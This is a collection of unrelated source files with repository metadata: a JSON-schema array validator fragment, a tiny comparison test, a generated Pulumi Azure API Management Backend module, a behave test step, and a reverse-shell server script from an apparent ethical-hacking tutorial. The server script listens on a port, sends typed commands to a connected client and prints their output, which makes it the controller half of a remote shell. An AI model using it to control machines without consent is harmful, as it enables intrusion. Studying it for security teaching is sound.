isklass = isinstance(elem, type) and util.safe_issubclass(
elem, (classbuilder.ProtocolBase, classbuilder.LiteralValue)
)
if not any([isdict, isklass]):
raise TypeError(
"Item constraint (position {0}) is not a schema".format(i)
)
elif isinstance(
item_constraint, (classbuilder.TypeProxy, classbuilder.TypeRef)
):
pass
elif util.safe_issubclass(item_constraint, ArrayWrapper):
pass
else:
isdict = isinstance(item_constraint, (dict,))
isklass = isinstance(item_constraint, type) and util.safe_issubclass(
item_constraint,
(classbuilder.ProtocolBase, classbuilder.LiteralValue),
)
if not any([isdict, isklass]):
raise TypeError("Item constraint is not a schema")
if isdict and "$ref" in item_constraint:
if klassbuilder is None:
raise TypeError(
"Cannot resolve {0} without classbuilder".format(
item_constraint["$ref"]
)
)
item_constraint = klassbuilder.resolve_type(
item_constraint["$ref"], name
)
elif isdict and item_constraint.get("type") == "array":
# We need to create a sub-array validator.
item_constraint = ArrayWrapper.create(
name + "#sub",
item_constraint=item_constraint["items"],
addl_constraints=item_constraint,
)
elif isdict and "oneOf" in item_constraint:
# We need to create a TypeProxy validator
uri = "{0}_{1}".format(name, "<anonymous_list_type>")
type_array = klassbuilder.construct_objects(
item_constraint["oneOf"], uri
)
item_constraint = classbuilder.TypeProxy(type_array)
elif isdict and item_constraint.get("type") == "object":
"""We need to create a ProtocolBase object for this anonymous definition"""
uri = "{0}_{1}".format(name, "<anonymous_list_type>")
item_constraint = klassbuilder.construct(uri, item_constraint)
props["__itemtype__"] = item_constraint
strict = addl_constraints.pop("strict", False)
props["_strict_"] = strict
props.update(addl_constraints)
validator = type(str(name), (ArrayWrapper,), props)
return validator
|
67054ae3579c2b254223f3232a8c79ae42dbbc9d
|
c5a69158ac5966d8ba8f3b2e2fb4c35d49a0658d
|
/tests/compare.py
|
bc4bb5bc9f2211c76bd8635b41d0153ae6586536
|
[
"MIT"
] |
permissive
|
csvoss/onelinerizer
|
d47202733f1b6935146b05027381bea9fbde0d04
|
bad341f261d35e56872b4c22297a44dc6d5cfab3
|
refs/heads/master
| 2022-07-06T05:51:02.018368
| 2022-01-15T18:43:08
| 2022-01-15T18:43:08
| 29,375,764
| 1,126
| 102
|
MIT
| 2018-10-20T00:41:35
| 2015-01-17T01:32:08
|
Python
|
UTF-8
|
Python
| false
| false
| 30
|
py
|
compare.py
|
x = 3
y = 4
print (x < y < 5)
|
cae9fd9a6ab27b98a23479bb3308c6d5adbc2af9
|
f487532281c1c6a36a5c62a29744d8323584891b
|
/sdk/python/pulumi_azure/apimanagement/backend.py
|
753a3c14cadd6cd952376db7c486cd005a7fe009
|
[
"MPL-2.0",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure
|
a8f8f21c46c802aecf1397c737662ddcc438a2db
|
c16962e5c4f5810efec2806b8bb49d0da960d1ea
|
refs/heads/master
| 2023-08-25T00:17:05.290397
| 2023-08-24T06:11:55
| 2023-08-24T06:11:55
| 103,183,737
| 129
| 57
|
Apache-2.0
| 2023-09-13T05:44:10
| 2017-09-11T20:19:15
|
Java
|
UTF-8
|
Python
| false
| false
| 32,879
|
py
|
backend.py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BackendArgs', 'Backend']
@pulumi.input_type
class BackendArgs:
def __init__(__self__, *,
api_management_name: pulumi.Input[str],
protocol: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
url: pulumi.Input[str],
credentials: Optional[pulumi.Input['BackendCredentialsArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input['BackendProxyArgs']] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input['BackendServiceFabricClusterArgs']] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input['BackendTlsArgs']] = None):
"""
The set of arguments for constructing a Backend resource.
:param pulumi.Input[str] api_management_name: The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] protocol: The protocol used by the backend host. Possible values are `http` or `soap`.
:param pulumi.Input[str] resource_group_name: The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] url: The URL of the backend host.
:param pulumi.Input['BackendCredentialsArgs'] credentials: A `credentials` block as documented below.
:param pulumi.Input[str] description: The description of the backend.
:param pulumi.Input[str] name: The name of the API Management backend. Changing this forces a new resource to be created.
:param pulumi.Input['BackendProxyArgs'] proxy: A `proxy` block as documented below.
:param pulumi.Input[str] resource_id: The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
:param pulumi.Input['BackendServiceFabricClusterArgs'] service_fabric_cluster: A `service_fabric_cluster` block as documented below.
:param pulumi.Input[str] title: The title of the backend.
:param pulumi.Input['BackendTlsArgs'] tls: A `tls` block as documented below.
"""
pulumi.set(__self__, "api_management_name", api_management_name)
pulumi.set(__self__, "protocol", protocol)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "url", url)
if credentials is not None:
pulumi.set(__self__, "credentials", credentials)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if proxy is not None:
pulumi.set(__self__, "proxy", proxy)
if resource_id is not None:
pulumi.set(__self__, "resource_id", resource_id)
if service_fabric_cluster is not None:
pulumi.set(__self__, "service_fabric_cluster", service_fabric_cluster)
if title is not None:
pulumi.set(__self__, "title", title)
if tls is not None:
pulumi.set(__self__, "tls", tls)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Input[str]:
"""
The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
"""
The protocol used by the backend host. Possible values are `http` or `soap`.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def url(self) -> pulumi.Input[str]:
"""
The URL of the backend host.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: pulumi.Input[str]):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def credentials(self) -> Optional[pulumi.Input['BackendCredentialsArgs']]:
"""
A `credentials` block as documented below.
"""
return pulumi.get(self, "credentials")
@credentials.setter
def credentials(self, value: Optional[pulumi.Input['BackendCredentialsArgs']]):
pulumi.set(self, "credentials", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the backend.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management backend. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def proxy(self) -> Optional[pulumi.Input['BackendProxyArgs']]:
"""
A `proxy` block as documented below.
"""
return pulumi.get(self, "proxy")
@proxy.setter
def proxy(self, value: Optional[pulumi.Input['BackendProxyArgs']]):
pulumi.set(self, "proxy", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter(name="serviceFabricCluster")
def service_fabric_cluster(self) -> Optional[pulumi.Input['BackendServiceFabricClusterArgs']]:
"""
A `service_fabric_cluster` block as documented below.
"""
return pulumi.get(self, "service_fabric_cluster")
@service_fabric_cluster.setter
def service_fabric_cluster(self, value: Optional[pulumi.Input['BackendServiceFabricClusterArgs']]):
pulumi.set(self, "service_fabric_cluster", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
"""
The title of the backend.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def tls(self) -> Optional[pulumi.Input['BackendTlsArgs']]:
"""
A `tls` block as documented below.
"""
return pulumi.get(self, "tls")
@tls.setter
def tls(self, value: Optional[pulumi.Input['BackendTlsArgs']]):
pulumi.set(self, "tls", value)
@pulumi.input_type
class _BackendState:
def __init__(__self__, *,
api_management_name: Optional[pulumi.Input[str]] = None,
credentials: Optional[pulumi.Input['BackendCredentialsArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input['BackendProxyArgs']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input['BackendServiceFabricClusterArgs']] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input['BackendTlsArgs']] = None,
url: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Backend resources.
:param pulumi.Input[str] api_management_name: The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
:param pulumi.Input['BackendCredentialsArgs'] credentials: A `credentials` block as documented below.
:param pulumi.Input[str] description: The description of the backend.
:param pulumi.Input[str] name: The name of the API Management backend. Changing this forces a new resource to be created.
:param pulumi.Input[str] protocol: The protocol used by the backend host. Possible values are `http` or `soap`.
:param pulumi.Input['BackendProxyArgs'] proxy: A `proxy` block as documented below.
:param pulumi.Input[str] resource_group_name: The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_id: The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
:param pulumi.Input['BackendServiceFabricClusterArgs'] service_fabric_cluster: A `service_fabric_cluster` block as documented below.
:param pulumi.Input[str] title: The title of the backend.
:param pulumi.Input['BackendTlsArgs'] tls: A `tls` block as documented below.
:param pulumi.Input[str] url: The URL of the backend host.
"""
if api_management_name is not None:
pulumi.set(__self__, "api_management_name", api_management_name)
if credentials is not None:
pulumi.set(__self__, "credentials", credentials)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if proxy is not None:
pulumi.set(__self__, "proxy", proxy)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if resource_id is not None:
pulumi.set(__self__, "resource_id", resource_id)
if service_fabric_cluster is not None:
pulumi.set(__self__, "service_fabric_cluster", service_fabric_cluster)
if title is not None:
pulumi.set(__self__, "title", title)
if tls is not None:
pulumi.set(__self__, "tls", tls)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> Optional[pulumi.Input[str]]:
"""
The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter
def credentials(self) -> Optional[pulumi.Input['BackendCredentialsArgs']]:
"""
A `credentials` block as documented below.
"""
return pulumi.get(self, "credentials")
@credentials.setter
def credentials(self, value: Optional[pulumi.Input['BackendCredentialsArgs']]):
pulumi.set(self, "credentials", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the backend.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management backend. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
The protocol used by the backend host. Possible values are `http` or `soap`.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter
def proxy(self) -> Optional[pulumi.Input['BackendProxyArgs']]:
"""
A `proxy` block as documented below.
"""
return pulumi.get(self, "proxy")
@proxy.setter
def proxy(self, value: Optional[pulumi.Input['BackendProxyArgs']]):
pulumi.set(self, "proxy", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter(name="serviceFabricCluster")
def service_fabric_cluster(self) -> Optional[pulumi.Input['BackendServiceFabricClusterArgs']]:
"""
A `service_fabric_cluster` block as documented below.
"""
return pulumi.get(self, "service_fabric_cluster")
@service_fabric_cluster.setter
def service_fabric_cluster(self, value: Optional[pulumi.Input['BackendServiceFabricClusterArgs']]):
pulumi.set(self, "service_fabric_cluster", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
"""
The title of the backend.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def tls(self) -> Optional[pulumi.Input['BackendTlsArgs']]:
"""
A `tls` block as documented below.
"""
return pulumi.get(self, "tls")
@tls.setter
def tls(self, value: Optional[pulumi.Input['BackendTlsArgs']]):
pulumi.set(self, "tls", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
The URL of the backend host.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
class Backend(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
credentials: Optional[pulumi.Input[pulumi.InputType['BackendCredentialsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input[pulumi.InputType['BackendProxyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']]] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[pulumi.InputType['BackendTlsArgs']]] = None,
url: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a backend within an API Management Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_service = azure.apimanagement.Service("exampleService",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
publisher_name="My Company",
publisher_email="company@exmaple.com",
sku_name="Developer_1")
example_backend = azure.apimanagement.Backend("exampleBackend",
resource_group_name=example_resource_group.name,
api_management_name=example_service.name,
protocol="http",
url="https://backend")
```
## Import
API Management backends can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/backend:Backend example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.ApiManagement/service/instance1/backends/backend1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['BackendCredentialsArgs']] credentials: A `credentials` block as documented below.
:param pulumi.Input[str] description: The description of the backend.
:param pulumi.Input[str] name: The name of the API Management backend. Changing this forces a new resource to be created.
:param pulumi.Input[str] protocol: The protocol used by the backend host. Possible values are `http` or `soap`.
:param pulumi.Input[pulumi.InputType['BackendProxyArgs']] proxy: A `proxy` block as documented below.
:param pulumi.Input[str] resource_group_name: The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_id: The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
:param pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']] service_fabric_cluster: A `service_fabric_cluster` block as documented below.
:param pulumi.Input[str] title: The title of the backend.
:param pulumi.Input[pulumi.InputType['BackendTlsArgs']] tls: A `tls` block as documented below.
:param pulumi.Input[str] url: The URL of the backend host.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BackendArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a backend within an API Management Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_service = azure.apimanagement.Service("exampleService",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
publisher_name="My Company",
publisher_email="company@exmaple.com",
sku_name="Developer_1")
example_backend = azure.apimanagement.Backend("exampleBackend",
resource_group_name=example_resource_group.name,
api_management_name=example_service.name,
protocol="http",
url="https://backend")
```
## Import
API Management backends can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/backend:Backend example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.ApiManagement/service/instance1/backends/backend1
```
:param str resource_name: The name of the resource.
:param BackendArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BackendArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
credentials: Optional[pulumi.Input[pulumi.InputType['BackendCredentialsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input[pulumi.InputType['BackendProxyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']]] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[pulumi.InputType['BackendTlsArgs']]] = None,
url: Optional[pulumi.Input[str]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BackendArgs.__new__(BackendArgs)
if api_management_name is None and not opts.urn:
raise TypeError("Missing required property 'api_management_name'")
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["credentials"] = credentials
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
if protocol is None and not opts.urn:
raise TypeError("Missing required property 'protocol'")
__props__.__dict__["protocol"] = protocol
__props__.__dict__["proxy"] = proxy
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["service_fabric_cluster"] = service_fabric_cluster
__props__.__dict__["title"] = title
__props__.__dict__["tls"] = tls
if url is None and not opts.urn:
raise TypeError("Missing required property 'url'")
__props__.__dict__["url"] = url
super(Backend, __self__).__init__(
'azure:apimanagement/backend:Backend',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
credentials: Optional[pulumi.Input[pulumi.InputType['BackendCredentialsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input[pulumi.InputType['BackendProxyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']]] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[pulumi.InputType['BackendTlsArgs']]] = None,
url: Optional[pulumi.Input[str]] = None) -> 'Backend':
"""
Get an existing Backend resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['BackendCredentialsArgs']] credentials: A `credentials` block as documented below.
:param pulumi.Input[str] description: The description of the backend.
:param pulumi.Input[str] name: The name of the API Management backend. Changing this forces a new resource to be created.
:param pulumi.Input[str] protocol: The protocol used by the backend host. Possible values are `http` or `soap`.
:param pulumi.Input[pulumi.InputType['BackendProxyArgs']] proxy: A `proxy` block as documented below.
:param pulumi.Input[str] resource_group_name: The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_id: The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
:param pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']] service_fabric_cluster: A `service_fabric_cluster` block as documented below.
:param pulumi.Input[str] title: The title of the backend.
:param pulumi.Input[pulumi.InputType['BackendTlsArgs']] tls: A `tls` block as documented below.
:param pulumi.Input[str] url: The URL of the backend host.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BackendState.__new__(_BackendState)
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["credentials"] = credentials
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["protocol"] = protocol
__props__.__dict__["proxy"] = proxy
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["service_fabric_cluster"] = service_fabric_cluster
__props__.__dict__["title"] = title
__props__.__dict__["tls"] = tls
__props__.__dict__["url"] = url
return Backend(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Output[str]:
"""
The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@property
@pulumi.getter
def credentials(self) -> pulumi.Output[Optional['outputs.BackendCredentials']]:
"""
A `credentials` block as documented below.
"""
return pulumi.get(self, "credentials")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the backend.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the API Management backend. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
The protocol used by the backend host. Possible values are `http` or `soap`.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter
def proxy(self) -> pulumi.Output[Optional['outputs.BackendProxy']]:
"""
A `proxy` block as documented below.
"""
return pulumi.get(self, "proxy")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Output[Optional[str]]:
"""
The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="serviceFabricCluster")
def service_fabric_cluster(self) -> pulumi.Output[Optional['outputs.BackendServiceFabricCluster']]:
"""
A `service_fabric_cluster` block as documented below.
"""
return pulumi.get(self, "service_fabric_cluster")
@property
@pulumi.getter
def title(self) -> pulumi.Output[Optional[str]]:
"""
The title of the backend.
"""
return pulumi.get(self, "title")
@property
@pulumi.getter
def tls(self) -> pulumi.Output[Optional['outputs.BackendTls']]:
"""
A `tls` block as documented below.
"""
return pulumi.get(self, "tls")
@property
@pulumi.getter
def url(self) -> pulumi.Output[str]:
"""
The URL of the backend host.
"""
return pulumi.get(self, "url")
|
e90c7f3f134728e19ef8b3fb945e1aacb992bc24
|
d05c946e345baa67e7894ee33ca21e24b8d26028
|
/ethical-hacking/reverse_shell/server.py
|
e143aed2ee354d92cf4bbd6b2653cf1e2f80005a
|
[
"MIT"
] |
permissive
|
x4nth055/pythoncode-tutorials
|
327255550812f84149841d56f2d13eaa84efd42e
|
d6ba5d672f7060ba88384db5910efab1768c7230
|
refs/heads/master
| 2023-09-01T02:36:58.442748
| 2023-08-19T14:04:34
| 2023-08-19T14:04:34
| 199,449,624
| 1,858
| 2,055
|
MIT
| 2023-08-25T20:41:56
| 2019-07-29T12:35:40
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,539
|
py
|
server.py
|
import socket
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5003
BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase
# separator string for sending 2 messages in one go
SEPARATOR = "<sep>"
# create a socket object
s = socket.socket()
# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
# make the PORT reusable
# when you run the server multiple times in Linux, Address already in use error will raise
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
# receiving the current working directory of the client
cwd = client_socket.recv(BUFFER_SIZE).decode()
print("[+] Current working directory:", cwd)
while True:
# get the command from prompt
command = input(f"{cwd} $> ")
if not command.strip():
# empty command
continue
# send the command to the client
client_socket.send(command.encode())
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# retrieve command results
output = client_socket.recv(BUFFER_SIZE).decode()
print("output:", output)
# split command output and current directory
results, cwd = output.split(SEPARATOR)
# print output
print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()
|
33b8b468afd041fe46930d44ee8f53f426201d33
|
97d7455fbaa56813e97cf601e4a23786d47c2e2c
|
/general_itests/steps/run_steps.py
|
b332f8e91110cec4f042f2d2982bc4c3ef485aa5
|
[
"Apache-2.0"
] |
permissive
|
Yelp/paasta
|
9138fbb0beaaa6146520c1483144679f9d5d4941
|
6fafc7c86073f136e64b959b963994be3d6160ab
|
refs/heads/master
| 2023-08-17T00:00:47.610727
| 2023-08-10T21:40:26
| 2023-08-10T21:40:26
| 44,998,824
| 1,805
| 291
|
Apache-2.0
| 2023-09-13T20:40:04
| 2015-10-26T21:35:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,035
|
py
|
run_steps.py
|
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import signal
from behave import then
from behave import when
from paasta_tools.utils import _run
@when("we run a trivial command with timeout {timeout} seconds")
def run_command(context, timeout):
fake_cmd = "sleep 1"
context.rc, context.output = _run(fake_cmd, timeout=float(timeout))
@then("the command is killed with signal {killsignal}")
def check_exit_code(context, killsignal):
assert context.rc == -1 * getattr(signal, killsignal)
|
0d45d12eb9163aaeacd9b326c0ae3cf4a0967ace
|
c50e7eb190802d7849c0d0cea02fb4d2f0021777
|
/src/webpubsub/azext_webpubsub/vendored_sdks/azure_messaging_webpubsubservice/rest.py
|
8da673e1a390ec7f8ade5b4705500532a68c4e3f
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
